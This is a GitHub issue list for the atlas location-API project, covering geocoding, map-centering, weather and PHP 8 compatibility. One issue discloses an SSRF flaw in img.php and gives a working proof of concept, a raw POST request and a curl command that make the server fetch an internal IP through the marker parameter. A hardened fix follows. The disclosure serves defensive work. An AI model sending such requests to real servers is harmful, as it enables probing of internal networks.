aaronpk / atlas

🌎 Atlas is a set of APIs for looking up information about locations

License: Apache License 2.0

PHP 12.50% CSS 43.59% Hack 0.67% Less 21.48% SCSS 21.76%
indieweb gps location geo geospatial geocoding p3k

atlas's People

Contributors

aaronpk

atlas's Issues

Only look for address in wider distance if not found at first try

As we discussed:
Since I live close to the border, Atlas gives the wrong address for my home location. It seems to be a problem with the &distance=10000 parameter on the API call to geocode.arcgis.com.

This was originally used to get a location in areas where no address was found, extending the search area by 10km.

The solution would be to first make a request without the parameter, and only if it returns empty, fetch with the 10km distance param.

You can check the API calls with coordinates for my home address in this private post, if you need testing.

Publish a zip file as a release

Publish a zip file including the vendor folder containing dependencies so you can unzip it and run it without needing to use composer.

feature request: determine timezone offset for local timestamp

I'd like a feature where I submit a date and local time (without a timezone) and get, if possible, the timezone for this time and/or a fully tz-aware timestamp.

This is a bit ugly since it has edge cases: timestamps can be either invalid or ambiguous, e.g. when they fall in a DST switch. For me, erroring out would be acceptable behavior in both cases.

wrong centering for maps with lines that should cross -180 longitude

Right now the map is always drawn with -180 on the left. When a line spans from, for example, Tokyo to LA, the line is drawn the wrong way instead of crossing the -180 line.

  • Pick a better center for the map
  • Wrapping the map tiles around the -180 line
  • Draw path lines crossing the -180 line

Tile URL(s) have changed

Adding a couple of lines similar to curl_setopt($chs[$x][$y], CURLOPT_FOLLOWLOCATION, true); in just the right places seems to do the trick.

Found out after I got a server error. There's actually a comment in the code that reads // In case any of the tiles fail, they will be grey instead of throwing an error: this is not quite true; in this case, the response is non-empty (it is a 301 error/redirect page), causing imagecreatefromstring() to run but return false. This in turn leads to a fatal error when imagesx($tile) gets called: imagesx(): Argument #1 ($image) must be of type GdImage, bool given.

Not sure if this library is still maintained, just thought I'd leave this here anyhow.

add web map viewer

with URL parameters like lat/lng to be able to quickly create a URL that loads a map pin at a certain location

add weather API

given a lat/lng, return information about the current weather at that location:

  • temperature
  • humidity
  • pressure
  • "feels like" temperature
  • wind / wind gust
  • rain in the last hour
  • icon URL that represents current state (cloudy, raining, sunny, etc)

Use weather icons from https://erikflowers.github.io/weather-icons/

Weather data from wunderground

SSRF vulnerability in `curl_init` Function of `img.php` File (Static Maps API latest version)

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: latest
Test with PHP 7.2

The vulnerable code is located in the curl_init function of the img.php file, which does not sufficiently validate the marker parameter. The taint is introduced from the $markersTemp variable in img.php and eventually reaches the tainted function curl_init; after curl_exec executes, a request is sent to the URL specified by the marker parameter, eventually leading to an SSRF vulnerability.

......
if($markersTemp=request('marker')) {
  if(!is_array($markersTemp))
    $markersTemp = array($markersTemp);
......
        if(preg_match('/https?:\/\/(.+)/', $properties['icon'], $match)) {
          // Looks like an external image, attempt to download it
          $ch = curl_init($properties['icon']);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          $img = curl_exec($ch);
......

Because the marker parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows:

POST /img.php HTTP/1.1
Host: 172.16.119.1:81
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: close

marker=icon:http://172.16.119.1/testpoc;lat:lat123;lng:lng123

You can also use the following curl command to verify the vulnerability:

curl -i -s -k -X $'POST' \
    -H $'Host: 172.16.119.1:81' -H $'Content-Length: 61' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' \
    --data-binary $'marker=icon:http://172.16.119.1/testpoc;lat:lat123;lng:lng123' \
    $'http://172.16.119.1:81/img.php'
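A hardened replacement for the icon fetch quoted in this report, added here as an example and not code from the atlas / Static Maps API project. It validates the marker icon URL before curl_init() is reached (scheme, credentials, port and the resolved address, which must be public), pins the checked address with CURLOPT_RESOLVE, refuses redirects, and rejects any non-200 or non-image body so that the imagecreatefromstring() false result from the tile-URL issue above never reaches imagesx(). The names fetchIconSafely, resolvesToPublicIp and MAX_ICON_BYTES are illustrative.

```php
<?php
// Added example, not code from the atlas / Static Maps API project: a hardened version of the
// icon fetch in img.php that validates the marker icon URL before curl_init() is reached.
// Names (fetchIconSafely, resolvesToPublicIp, MAX_ICON_BYTES) are illustrative.
const MAX_ICON_BYTES = 512 * 1024;

// Resolve $host and return its addresses only if every one is public (no loopback,
// RFC 1918, link-local or other reserved ranges); an empty array means "reject".
function resolvesToPublicIp(string $host): array {
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $ips = [$host];                       // literal address, nothing to resolve
    } else {
        $ips = [];
        foreach (dns_get_record($host, DNS_A | DNS_AAAA) ?: [] as $rec) {
            $ips[] = $rec['ip'] ?? $rec['ipv6'] ?? '';
        }
    }
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) return [];
    }
    return $ips;
}

// Returns a GdImage on success, false for anything that must not be fetched or rendered.
function fetchIconSafely(string $url) {
    $p = parse_url($url);
    if ($p === false || !in_array($p['scheme'] ?? '', ['http', 'https'], true)) return false;
    if (isset($p['user']) || isset($p['pass']) || empty($p['host'])) return false;
    $port = $p['port'] ?? ($p['scheme'] === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) return false;   // no port probing via marker=
    $ips = resolvesToPublicIp($p['host']);
    if ($ips === []) return false;                          // e.g. http://172.16.119.1/... is refused
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,   // a redirect could point back into the intranet
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$p['host']}:$port:{$ips[0]}"], // pin the checked IP (no DNS rebinding)
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_TIMEOUT        => 5,
        CURLOPT_MAXFILESIZE    => MAX_ICON_BYTES,
    ]);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    // A 301 page or an HTML error page is not an image: fail here instead of passing it to imagesx().
    if ($body === false || $status !== 200 || strlen($body) > MAX_ICON_BYTES) return false;
    return imagecreatefromstring($body);   // false on non-image bytes; callers must check before imagesx()
}
```

Callers should treat a false return as "draw the default marker" rather than calling imagesx() on it.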


Not compatible with PHP 8

Possibly an issue with Savant3 dependency not being compatible with PHP 8. Running the application produces this error:

Fatal error: Uncaught ValueError: func_get_arg(): Argument #1 ($position) must be less than the number of the arguments passed to the currently executed function in 
/app/vendor/saltybeagle/savant3/Savant3.php:901

Stack trace:
#0 /app/vendor/saltybeagle/savant3/Savant3.php(901): func_get_arg(1)
#1 /app/vendor/p3k/slim-savant/Savant.php(74): Savant3->assign(Array)
#2 /app/vendor/slim/slim/Slim/View.php(255): Slim\Extras\Views\Savant->render('layout.php', Array)
#3 /app/vendor/slim/slim/Slim/View.php(243): Slim\View->fetch('layout.php', NULL)
#4 /app/vendor/slim/slim/Slim/Slim.php(755): Slim\View->display('layout.php')
#5 /app/vendor/p3k/slim-savant/SlimSavant.php(19): Slim\Slim->render('layout.php', Array)
#6 /app/controllers/main.php(5): Slim\Savant\render('index')
#7 [internal function]: {closure}()
#8 /app/vendor/slim/slim/Slim/Route.php(468): call_user_func_array(Object(Closure), Array)
#9 /app/vendor/slim/slim/Slim/Slim.php(1355): Slim\Route->dispatch()
#10 /app/vendor/slim/slim/Slim/Middleware/Flash.php(85): Slim\Slim->call()
#11 /app/vendor/slim/slim/Slim/Middleware/MethodOverride.php(92): Slim\Middleware\Flash->call() 
#12 /app/vendor/slim/slim/Slim/Middleware/PrettyExceptions.php(67): Slim\Middleware\MethodOverride->call()
#13 /app/vendor/slim/slim/Slim/Slim.php(1300): Slim\Middleware\PrettyExceptions->call()
#14 /app/public/index.php(12): Slim\Slim->run()
#15 {main} thrown in /app/vendor/saltybeagle/savant3/Savant3.php on line 901

There may be other such incompatibility issues lurking in dependencies or in the app's own code.

PHP 7.x is no longer maintained and has reached end of life. One way this manifests itself is that versions below v8 are disabled in Brew, and not supported by tools like Nixpacks.
